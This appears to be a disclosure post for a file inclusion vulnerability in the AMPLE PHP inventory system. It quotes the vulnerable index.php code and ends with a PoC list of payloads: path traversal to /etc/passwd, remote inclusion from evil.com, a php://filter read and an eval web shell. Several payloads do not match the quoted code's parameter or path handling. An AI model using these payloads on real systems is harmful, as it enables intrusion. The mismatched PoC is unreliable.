Update
Update 2023/09/04
The vulnerability has been included and approved for public disclosure by MITRE.
Update 2023/09/03
On September 3rd, I submitted the vulnerability to the VulDB and was assigned a CVE number.
Vuln_Author: WEI(ギカク)
AMPLE
AMPLE is an open source inventory management system , written in php , for inventory management and monitoring of goods.
The following powerful features are included:
- Real-time Stock Visibility: Keep track of your inventory levels in real-time, ensuring you never run out of stock or overstock.
- Accurate Sales Tracking: Monitor sales patterns, identify popular products, and make data-driven decisions.
- Order Management: Process orders efficiently, reducing fulfillment time and enhancing customer satisfaction.
- Cost Savings: Minimize losses due to overstocking, spoilage, or theft, maximizing profitability.
File Inclusion Vulnerability
The file inclusion vulnerability exists in the index.php file with the following source code
<?php require_once 'inc/header.php'; ?>
<?php require_once 'inc/sidebar.php'; ?>
<!-- Content Wrapper. Contains page content -->
<?php
if (isset($_GET['page'])) {
$page ='pages/' .$_GET['page'].'.php';
}else{
$page = 'pages/dashboard.php';
}
if (file_exists($page)) {
require_once $page;
}else{
require_once 'pages/error_page.php';
}
?>
<!-- Control Sidebar -->
<aside class="control-sidebar control-sidebar-dark">
<!-- Control sidebar content goes here -->
</aside>
<!-- /.control-sidebar -->
<?php require_once 'inc/footer.php'; ?>
This code has a file inclusion vulnerability.
Unsanitized input from an HTTP parameter flows into require_once, where it is included dynamically. Allowing unvalidated user input to control files that are included dynamically in PHP can lead to malicious code execution.
PoC
Since it is a common file inclusion vulnerability, it can be very simple to construct a piece of malicious code to trigger the vulnerability.
http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?filename=http://evil.com/malicious.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
?c=data://text/plain,<?php echo "Gikaku";?>
?c=data://text/plain,<?php eval($_POST['cmd']);?>
コメントを投稿するにはログインしてください。